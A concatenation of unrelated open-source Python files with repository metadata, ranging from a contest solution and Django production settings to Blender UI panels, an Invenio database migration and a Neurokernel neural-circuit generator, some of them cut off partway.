Qualification_Round_2/Editorials/array_simp_2.py
|
Python
|
mit
| 683
| 0.030747
|
t = int(raw_input())
MOD = 10**9 + 7
def modexp(a,b):
res = 1
while b:
if b&1:
res *= a
res %= MOD
a = (a*a)%MOD
b /= 2
return res
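# modexp is square-and-multiply exponentiation (O(log b) multiplications).
# Below it is called as modexp(fn[i], MOD-2) to obtain modular inverses via
# Fermat's little theorem, valid because MOD = 10**9 + 7 is prime; this
# lets nCr answer each query in O(1).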
fn = [1 for _ in xrange(100001)]
ifn = [1 for _ in xrange(100001)]
for i in range(1,100000):
fn[i] = fn[i-1] * i
fn[i] %= MOD
ifn[i] = modexp(fn[i],MOD-2)
def nCr(n,k):
return fn[n] * ifn[k] * ifn[n-k]
for ti in range(t):
n = int(raw_input())
a = map(int,raw_input().split())
ans = 0
for i in range(n):
if i%2==0:
ans += nCr(n-1,i)%MOD * a[i]%MOD
else:
ans -= nCr(n-1,i)%MOD * a[i]%MOD
ans %= MOD
print ans
|
zcbenz/cefode-chromium
|
third_party/harfbuzz/contrib/tables/scripts-parse.py
|
Python
|
bsd-3-clause
| 2,516
| 0.010731
|
import sys
from unicode_parse_common import *
# http://www.unicode.org/Public/5.1.0/ucd/Scripts.txt
script_to_harfbuzz = {
# This is the list of HB_Script_* at the time of writing
'Common': 'HB_Script_Common',
'Greek': 'HB_Script_Greek',
'Cyrillic': 'HB_Script_Cyrillic',
'Armenian': 'HB_Script_Armenian',
'Hebrew': 'HB_Script_Hebrew',
'Arabic': 'HB_Script_Arabic',
'Syriac': 'HB_Script_Syriac',
'Thaana': 'HB_Script_Thaana',
'Devanagari': 'HB_Script_Devanagari',
'Bengali': 'HB_Script_Bengali',
'Gurmukhi': 'HB_Script_Gurmukhi',
'Gujarati': 'HB_Script_Gujarati',
'Oriya': 'HB_Script_Oriya',
'Tamil': 'HB_Script_Tamil',
'Telugu': 'HB_Script_Telugu',
'Kannada': 'HB_Script_Kannada',
'Malayalam': 'HB_Script_Malayalam',
'Sinhala': 'HB_Script_Sinhala',
'Thai': 'HB_Script_Thai',
'Lao': 'HB_Script_Lao',
'Tibetan': 'HB_Script_Tibetan',
'Myanmar': 'HB_Script_Myanmar',
'Georgian': 'HB_Script_Georgian',
'Hangul': 'HB_Script_Hangul',
'Ogham': 'HB_Script_Ogham',
'Runic': 'HB_Script_Runic',
'Khmer': 'HB_Script_Khmer',
'Inherited': 'HB_Script_Inherited',
}
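# ScriptDict is a read-through wrapper: script names missing from the base
# mapping fall back to HB_Script_Common instead of raising KeyError.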
class ScriptDict(object):
def __init__(self, base):
self.base = base
def __getitem__(self, key):
r = self.base.get(key, None)
if r is None:
return 'HB_Script_Common'
return r
def main(infile, outfile):
ranges = unicode_file_parse(infile,
ScriptDict(script_to_harfbuzz),
'HB_Script_Common')
ranges = sort_and_merge(ranges)
print >>outfile, '// Generated from Unicode script tables\n'
print >>outfile, '#ifndef SCRIPT_PROPERTIES_H_'
print >>outfile, '#define SCRIPT_PROPERTIES_H_\n'
print >>outfile, '#include <stdint.h>'
print >>outfile, '#include "harfbuzz-shaper.h"\n'
print >>outfile, 'struct script_property {'
print >>outfile, ' uint32_t range_start;'
print >>outfile, ' uint32_t range_end;'
print >>outfile, ' HB_Script script;'
print >>outfile, '};\n'
print >>outfile, 'static const struct script_property script_properties[] = {'
for (start, end, value) in ranges:
print >>outfile, ' {0x%x, 0x%x, %s},' % (start, end, value)
print >>outfile, '};\n'
print >>outfile, 'static const unsigned script_properties_count = %d;\n' % len(ranges)
print >>outfile, '#endif // SCRIPT_PROPERTIES_H_'
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <input .txt> <output .h>' % sys.argv[0]
else:
main(file(sys.argv[1], 'r'), file(sys.argv[2], 'w+'))
|
openstack/neutron-lib
|
neutron_lib/callbacks/resources.py
|
Python
|
apache-2.0
| 1,353
| 0
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# String literals representing core resources.
ADDRESS_GROUP = 'address_group'
AGENT = 'agent'
FLOATING_IP = 'floatingip'
LOCAL_IP_ASSOCIATION = 'local_ip_association'
NETWORK = 'network'
NETWORKS = 'networks'
PORT = 'port'
PORTS = 'ports'
PORT_BINDING = 'port_binding'
PORT_DEVICE = 'port_device'
PROCESS = 'process'
RBAC_POLICY = 'rbac-policy'
ROUTER = 'router'
ROUTER_CONTROLLER = 'router_controller'
ROUTER_GATEWAY = 'router_gateway'
ROUTER_INTERFACE = 'router_interface'
SECURITY_GROUP = 'security_group'
SECURITY_GROUP_RULE = 'security_group_rule'
SEGMENT = 'segment'
SEGMENT_HOST_MAPPING = 'segment_host_mapping'
SUBNET = 'subnet'
SUBNETS = 'subnets'
SUBNETPOOL_ADDRESS_SCOPE = 'subnetpool_address_scope'
SUBPORTS = 'subports'
TRUNK = 'trunk'
TRUNK_PLUGIN = 'trunk_plugin'
|
camilaavilarinho/monitorador-twitter
|
monitortwitter/settings/production.py
|
Python
|
mit
| 3,261
| 0.000613
|
from decouple import Csv, config
from dj_database_url import parse as db_url
from .base import * # noqa
DEBUG = False
SECRET_KEY = config('SECRET_KEY')
DATABASES = {
'default': config('DATABASE_URL', cast=db_url),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
ALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
MEDIA_ROOT = 'mediafiles'
MEDIA_URL = '/media/'
SERVER_EMAIL = 'foo@example.com'
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = config('SENDGRID_USERNAME')
EMAIL_HOST_PASSWORD = config('SENDGRID_PASSWORD')
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# Security
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
SECURE_SSL_REDIRECT = True
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_HSTS_SECONDS = 3600
SECURE_HSTS_INCLUDE_SUBDOMAINS = True
SECURE_CONTENT_TYPE_NOSNIFF = True
SECURE_BROWSER_XSS_FILTER = True
X_FRAME_OPTIONS = 'DENY'
CSRF_COOKIE_HTTPONLY = True
# Webpack
WEBPACK_LOADER['DEFAULT']['CACHE'] = True
# Celery
CELERY_BROKER_URL = config('REDIS_URL')
CELERY_RESULT_BACKEND = config('REDIS_URL')
CELERY_SEND_TASK_ERROR_EMAILS = True
# Whitenoise
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
MIDDLEWARE.insert( # insert WhiteNoiseMiddleware right after SecurityMiddleware
MIDDLEWARE.index('django.middleware.security.SecurityMiddleware') + 1,
'whitenoise.middleware.WhiteNoiseMiddleware')
# django-log-request-id
MIDDLEWARE.insert( # insert RequestIDMiddleware on the top
0, 'log_request_id.middleware.RequestIDMiddleware')
LOG_REQUEST_ID_HEADER = 'HTTP_X_REQUEST_ID'
LOG_REQUESTS = True
# Opbeat
INSTALLED_APPS += ['opbeat.contrib.django']
MIDDLEWARE.insert( # insert OpbeatAPMMiddleware on the top
0, 'opbeat.contrib.django.middleware.OpbeatAPMMiddleware')
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
},
'request_id': {
'()': 'log_request_id.filters.RequestIDFilter'
},
},
'formatters': {
'standard': {
'format': '%(levelname)-8s [%(asctime)s] [%(request_id)s] %(name)s: %(message)s'
},
},
'handlers': {
'null': {
'class': 'logging.NullHandler',
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler',
'filters': ['require_debug_false'],
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'filters': ['request_id'],
'formatter': 'standard',
},
},
'loggers': {
'': {
'handlers': ['console'],
'level': 'INFO'
},
'django.security.DisallowedHost': {
'handlers': ['null'],
'propagate': False,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'log_request_id.middleware': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': False,
},
}
}
|
Swan/ManiaStarReducer
|
test/example.py
|
Python
|
mit
| 398
| 0.005025
|
import sys
sys.path.append("..")
from deflate import fix_star_rating
# The beatmap that you are checking and fixing inflated patterns for
beatmap_path = "./necro.osu"
# The new difficulty name (Version) of the beatmap
new_difficulty_name = "star rating fix"
# The output file path of the beatmap
output_path = "./necro_fixed.osu"
fix_star_rating(beatmap_path, new_difficulty_name, output_path)
|
PLyczkowski/Sticky-Keymap
|
2.74/scripts/startup/bl_ui/properties_data_armature.py
|
Python
|
gpl-2.0
| 10,538
| 0.001803
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# <pep8 compliant>
import bpy
from bpy.types import Panel, Menu
from rna_prop_ui import PropertyPanel
class ArmatureButtonsPanel:
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "data"
@classmethod
def poll(cls, context):
return context.armature
class DATA_PT_context_arm(ArmatureButtonsPanel, Panel):
bl_label = ""
bl_options = {'HIDE_HEADER'}
def draw(self, context):
layout = self.layout
ob = context.object
arm = context.armature
space = context.space_data
if ob:
layout.template_ID(ob, "data")
elif arm:
layout.template_ID(space, "pin_id")
class DATA_PT_skeleton(ArmatureButtonsPanel, Panel):
bl_label = "Skeleton"
def draw(self, context):
layout = self.layout
arm = context.armature
layout.prop(arm, "pose_position", expand=True)
col = layout.column()
col.label(text="Layers:")
col.prop(arm, "layers", text="")
col.label(text="Protected Layers:")
col.prop(arm, "layers_protected", text="")
if context.scene.render.engine == 'BLENDER_GAME':
col = layout.column()
col.label(text="Deform:")
col.prop(arm, "deform_method", expand=True)
class DATA_PT_display(ArmatureButtonsPanel, Panel):
bl_label = "Display"
def draw(self, context):
layout = self.layout
ob = context.object
arm = context.armature
layout.prop(arm, "draw_type", expand=True)
split = layout.split()
col = split.column()
col.prop(arm, "show_names", text="Names")
col.prop(arm, "show_axes", text="Axes")
col.prop(arm, "show_bone_custom_shapes", text="Shapes")
col = split.column()
col.prop(arm, "show_group_colors", text="Colors")
if ob:
col.prop(ob, "show_x_ray", text="X-Ray")
col.prop(arm, "use_deform_delay", text="Delay Refresh")
class DATA_PT_bone_group_specials(Menu):
bl_label = "Bone Group Specials"
def draw(self, context):
layout = self.layout
layout.operator("pose.group_sort", icon='SORTALPHA')
class DATA_PT_bone_groups(ArmatureButtonsPanel, Panel):
bl_label = "Bone Groups"
@classmethod
def poll(cls, context):
return (context.object and context.object.type == 'ARMATURE' and context.object.pose)
def draw(self, context):
layout = self.layout
ob = context.object
pose = ob.pose
group = pose.bone_groups.active
row = layout.row()
rows = 1
if group:
rows = 4
row.template_list("UI_UL_list", "bone_groups", pose, "bone_groups", pose.bone_groups, "active_index", rows=rows)
col = row.column(align=True)
col.active = (ob.proxy is None)
col.operator("pose.group_add", icon='ZOOMIN', text="")
col.operator("pose.group_remove", icon='ZOOMOUT', text="")
col.menu("DATA_PT_bone_group_specials", icon='DOWNARROW_HLT', text="")
if group:
col.separator()
col.operator("pose.group_move", icon='TRIA_UP', text="").direction = 'UP'
col.operator("pose.group_move", icon='TRIA_DOWN', text="").direction = 'DOWN'
split = layout.split()
split.active = (ob.proxy is None)
col = split.column()
col.prop(group, "color_set")
if group.color_set:
col = split.column()
sub = col.row(align=True)
sub.enabled = group.is_custom_color_set # only custom colors are editable
sub.prop(group.colors, "normal", text="")
sub.prop(group.colors, "select", text="")
sub.prop(group.colors, "active", text="")
row = layout.row()
row.active = (ob.proxy is None)
sub = row.row(align=True)
sub.operator("pose.group_assign", text="Assign")
sub.operator("pose.group_unassign", text="Remove") # row.operator("pose.bone_group_remove_from", text="Remove")
sub = row.row(align=True)
sub.operator("pose.group_select", text="Select")
sub.operator("pose.group_deselect", text="Deselect")
class DATA_PT_pose_library(ArmatureButtonsPanel, Panel):
bl_label = "Pose Library"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
return (context.object and context.object.type == 'ARMATURE' and context.object.pose)
def draw(self, context):
layout = self.layout
ob = context.object
poselib = ob.pose_library
layout.template_ID(ob, "pose_library", new="poselib.new", unlink="poselib.unlink")
if poselib:
# list of poses in pose library
row = layout.row()
row.template_list("UI_UL_list", "pose_markers", poselib, "pose_markers",
poselib.pose_markers, "active_index", rows=3)
# column of operators for active pose
# - goes beside list
col = row.column(align=True)
col.active = (poselib.library is None)
# invoke should still be used for 'add', as it is needed to allow
# add/replace options to be used properly
col.operator("poselib.pose_add", icon='ZOOMIN', text="")
col.operator_context = 'EXEC_DEFAULT' # exec not invoke, so that menu doesn't need showing
pose_marker_active = poselib.pose_markers.active
if pose_marker_active is not None:
col.operator("poselib.pose_remove", icon='ZOOMOUT', text="")
col.operator("poselib.apply_pose", icon='ZOOM_SELECTED', text="").pose_index = poselib.pose_markers.active_index
col.operator("poselib.action_sanitize", icon='HELP', text="") # XXX: put in menu?
# TODO: this panel will soon be deprecated too
class DATA_PT_ghost(ArmatureButtonsPanel, Panel):
bl_label = "Ghost"
def draw(self, context):
layout = self.layout
arm = context.armature
layout.prop(arm, "ghost_type", expand=True)
split = layout.split()
col = split.column(align=True)
if arm.ghost_type == 'RANGE':
col.prop(arm, "ghost_frame_start", text="Start")
col.prop(arm, "ghost_frame_end", text="End")
col.prop(arm, "ghost_size", text="Step")
elif arm.ghost_type == 'CURRENT_FRAME':
col.prop(arm, "ghost_step", text="Range")
col.prop(arm, "ghost_size", text="Step")
col = split.column()
col.label(text="Display:")
col.prop(arm, "show_only_ghost_selected", text="Selected Only")
class DATA_PT_iksolver_itasc(ArmatureButtonsPanel, Panel):
bl_label = "Inverse Kinematics"
bl_options = {'DEFAULT_CLOSED'}
@classmethod
def poll(cls, context):
ob = context.object
return (ob and ob.pose)
def draw(self, context):
layout = self.layout
ob = context.object
itasc = ob.pose.ik_param
layout.prop(ob.pose, "ik_solver")
if itasc:
layout.prop(itasc, "mode", expand=True)
simulation = (itasc.mode == 'SIMULATION')
if simulation:
layout.label(text="Reiteration:")
layout.prop(itasc, "reiteration_metho
|
google/tmppy
|
_py2tmp/unification/__init__.py
|
Python
|
apache-2.0
| 920
| 0
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ._exceptions import (
UnificationAmbiguousException,
UnificationFailedException,
CanonicalizationFailedException)
from ._strategy import (
UnificationStrategy,
UnificationStrategyForCanonicalization,
TupleExpansion)
from ._unification import unify
from ._canonicalization import canonicalize
|
bitmovin/bitcodin-python
|
bitcodin/test/input/testcase_create_input_incomplete_data.py
|
Python
|
unlicense
| 727
| 0
|
__author__ = 'Dominic Miglar <dominic.miglar@bitmovin.net>'
import unittest
from bitcodin import create_input
from bitcodin import Input
from bitcodin.exceptions import BitcodinBadRequestError
from bitcodin.test.bitcodin_test_case import BitcodinTestCase
class CreateInputIncompleteDataTestCase(BitcodinTestCase):
def setUp(self):
super(CreateInputIncompleteDataTestCase, self).setUp()
self.inputUrl = ''
def runTest(self):
input = Input(self.inputUrl)
with self.assertRaises(BitcodinBadRequestError):
result = create_input(input)
def tearDown(self):
super(CreateInputIncompleteDataTestCase, self).tearDown()
if __name__ == '__main__':
unittest.main()
|
ikkebr/PyBozoCrack
|
docs/conf.py
|
Python
|
bsd-3-clause
| 8,453
| 0.005442
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import pybozocrack
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'PyBozoCrack'
copyright = u'2014, Henrique Pereira'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = pybozocrack.__version__
# The full version, including alpha/beta/rc tags.
release = pybozocrack.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pybozocrackdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'pybozocrack.tex',
u'PyBozoCrack Documentation',
u'Henrique Pereira', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pybozocrack',
u'PyBozoCrack Documentation',
[u'Henrique Pereira'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pybozocrack',
u'PyBozoCrack Documentation',
u'Henrique Pereira',
'pybozocrack',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices
|
tiborsimko/invenio-oauthclient
|
invenio_oauthclient/alembic/97bbc733896c_create_oauthclient_tables.py
|
Python
|
mit
| 2,898
| 0
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2016-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Create oauthclient tables."""
import sqlalchemy as sa
import sqlalchemy_utils
from alembic import op
from sqlalchemy.engine.reflection import Inspector
# revision identifiers, used by Alembic.
revision = '97bbc733896c'
down_revision = '44ab9963e8cf'
branch_labels = ()
depends_on = '9848d0149abd'
def upgrade():
"""Upgrade database."""
op.create_table(
'oauthclient_remoteaccount',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('client_id', sa.String(length=255), nullable=False),
sa.Column(
'extra_data',
sqlalchemy_utils.JSONType(),
nullable=False),
sa.ForeignKeyConstraint(['user_id'], [u'accounts_user.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('user_id', 'client_id')
)
op.create_table(
'oauthclient_useridentity',
sa.Column('id', sa.String(length=255), nullable=False),
sa.Column('method', sa.String(length=255), nullable=False),
sa.Column('id_user', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['id_user'], [u'accounts_user.id'], ),
sa.PrimaryKeyConstraint('id', 'method')
)
op.create_index(
'useridentity_id_user_method', 'oauthclient_useridentity',
['id_user', 'method'], unique=True
)
op.create_table(
'oauthclient_remotetoken',
sa.Column('id_remote_account', sa.Integer(), nullable=False),
sa.Column('token_type', sa.String(length=40), nullable=False),
sa.Column(
'access_token',
sqlalchemy_utils.EncryptedType(),
nullable=False),
sa.Column('secret', sa.Text(), nullable=False),
sa.ForeignKeyConstraint(
['id_remote_account'], [u'oauthclient_remoteaccount.id'],
name='fk_oauthclient_remote_token_remote_account'
),
sa.PrimaryKeyConstraint('id_remote_account', 'token_type')
)
def downgrade():
"""Downgrade database."""
ctx = op.get_context()
insp = Inspector.from_engine(ctx.connection.engine)
op.drop_table('oauthclient_remotetoken')
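# Drop the FK to accounts_user explicitly before removing the index and
# table: some backends (e.g. MySQL) refuse to drop an index that a foreign
# key still depends on.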
for fk in insp.get_foreign_keys('oauthclient_useridentity'):
if fk['referred_table'] == 'accounts_user':
op.drop_constraint(
op.f(fk['name']),
'oauthclient_useridentity',
type_='foreignkey'
)
op.drop_index(
'useridentity_id_user_method',
table_name='oauthclient_useridentity')
op.drop_table('oauthclient_useridentity')
op.drop_table('oauthclient_remoteaccount')
|
AdamRTomkins/Neurokernel-singularity-container
|
examples/data/gen_generic_lpu.py
|
Python
|
apache-2.0
| 12,988
| 0.004312
|
#!/usr/bin/env python
"""
Create generic LPU and simple pulse input signal.
"""
from itertools import product
import sys
import numpy as np
import h5py
import networkx as nx
def create_lpu_graph(lpu_name, N_sensory, N_local, N_proj):
"""
Create a generic LPU graph.
Creates a graph containing the neuron and synapse parameters for an LPU
containing the specified number of local and projection neurons. The graph
also contains the parameters for a set of sensory neurons that accept
external input. All neurons are either spiking or graded potential neurons;
the Leaky Integrate-and-Fire model is used for the former, while the
Morris-Lecar model is used for the latter (i.e., the neuron's membrane
potential is deemed to be its output rather than the time when it emits an
action potential). Synapses use either the alpha function model or a
conductance-based model.
Parameters
----------
lpu_name : str
Name of LPU. Used in port identifiers.
N_sensory : int
Number of sensory neurons.
N_local : int
Number of local neurons.
N_proj : int
Number of project neurons.
Returns
-------
g : networkx.MultiDiGraph
Generated graph.
"""
# Set numbers of neurons:
neu_type = ('sensory', 'local', 'proj')
neu_num = (N_sensory, N_local, N_proj)
# Neuron ids are between 0 and the total number of neurons:
G = nx.MultiDiGraph()
in_port_idx = 0
spk_out_id = 0
gpot_out_id = 0
for (t, n) in zip(neu_type, neu_num):
for i in range(n):
id = t+"_"+str(i)
name = t+"_"+str(i)
# Half of the sensory neurons and projection neurons are
# spiking neurons. The other half are graded potential neurons.
# All local neurons are graded potential only.
if t != 'local' and np.random.rand() < 0.5:
G.add_node(id,
{'class': 'LeakyIAF',
'name': name+'_s',
'initV': np.random.uniform(-60.0,-25.0),
'reset_potential': -67.5489770451,
'resting_potential': 0.0,
'threshold': -25.1355161007,
'resistance': 1002.445570216,
'capacitance': 0.0669810502993,
'circuit': 'proj' if t == 'proj' else 'local'
})
# Projection neurons are all assumed to be attached to output
# ports (which are represented as separate nodes):
if t == 'proj':
G.add_node(id+'_port',
{'class': 'Port',
'name': name+'port',
'port_type': 'spike',
'port_io': 'out',
'selector': '/%s/out/spk/%s' % (lpu_name, str(spk_out_id))
})
G.add_edge(id, id+'_port')
spk_out_id += 1
else:
# An input port node is created for and attached to each non-projection
# neuron with a synapse; this assumes that data propagates from one LPU to
# another as follows:
# LPU0[projection neuron] -> LPU0[output port] -> LPU1[input port] ->
# LPU1[synapse] -> LPU1[non-projection neuron]
G.add_node('in_port'+str(in_port_idx),
{'class': 'Port',
'name': 'in_port'+str(in_port_idx),
'port_type': 'spike',
'port_io': 'in',
'selector': '/%s/in/spk/%s' % (lpu_name, in_port_idx)
})
G.add_node('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id,
{'class': 'AlphaSynapse',
'name': 'in_port'+str(in_port_idx)+'-'+name,
'ad': 0.19*1000,
'ar': 1.1*100,
'gmax': 0.003*1e-3,
'reverse': 65.0,
'circuit': 'local'
})
G.add_edge('in_port'+str(in_port_idx),
'synapse_'+'in_port'+str(in_port_idx)+'_to_'+id)
G.add_edge('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id,
id)
in_port_idx += 1
else:
G.add_node(id,
{'class': "MorrisLecar",
'name': name+'_g',
'V1': 30.,
'V2': 15.,
'V3': 0.,
'V4': 30.,
'phi': 0.025,
'offset': 0.,
'V_L': -50.,
'V_Ca': 100.0,
'V_K': -70.0,
'g_Ca': 1.1,
'g_K': 2.0,
'g_L': 0.5,
'initV': -52.14,
'initn': 0.02,
'circuit': 'proj' if t == 'proj' else 'local'
})
# Projection neurons are all assumed to be attached to output
# ports (which are not represented as separate nodes):
if t == 'proj':
G.add_node(id+'_port',
{'class': 'Port',
'name': name+'port',
'port_type': 'gpot',
'port_io': 'out',
'selector': '/%s/out/gpot/%s' % (lpu_name, str(gpot_out_id))
})
G.add_edge(id, id+'_port')
gpot_out_id += 1
else:
G.add_node('in_port'+str(in_port_idx),
{'class': 'Port',
'name': 'in_port'+str(in_port_idx),
'port_type': 'gpot',
'port_io': 'in',
'selector': '/%s/in/gpot/%s' % (lpu_name, in_port_idx)
})
G.add_node('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id,
{'class': 'PowerGPotGPot',
'name': 'in_port'+str(in_port_idx)+'-'+name,
'reverse': -80.0,
'saturation': 0.03*1e-3,
'slope': 0.8*1e-6,
'power': 1.0,
'threshold': -50.0,
'circuit': 'local'
})
G.add_edge('in_port'+str(in_port_idx),
'synapse_'+'in_port'+str(in_port_idx)+'_to_'+id,
delay = 0.001)
G.add_edge('synapse_'+'in_port'+str(in_port_idx)+'_to_'+id,
id)
in_port_idx += 1
# Assume a probability of synapse existence for each group of synapses:
# sensory -> local, sensory -> projection, local -> projection,
# projection -> local:
for r, (i, j) in zip((0.5, 0.1, 0.1, 0.3),
((0, 1), (0, 2), (1, 2), (2, 1))):
for src, tar in product(range(neu_num[i]), range(neu_num[j])):
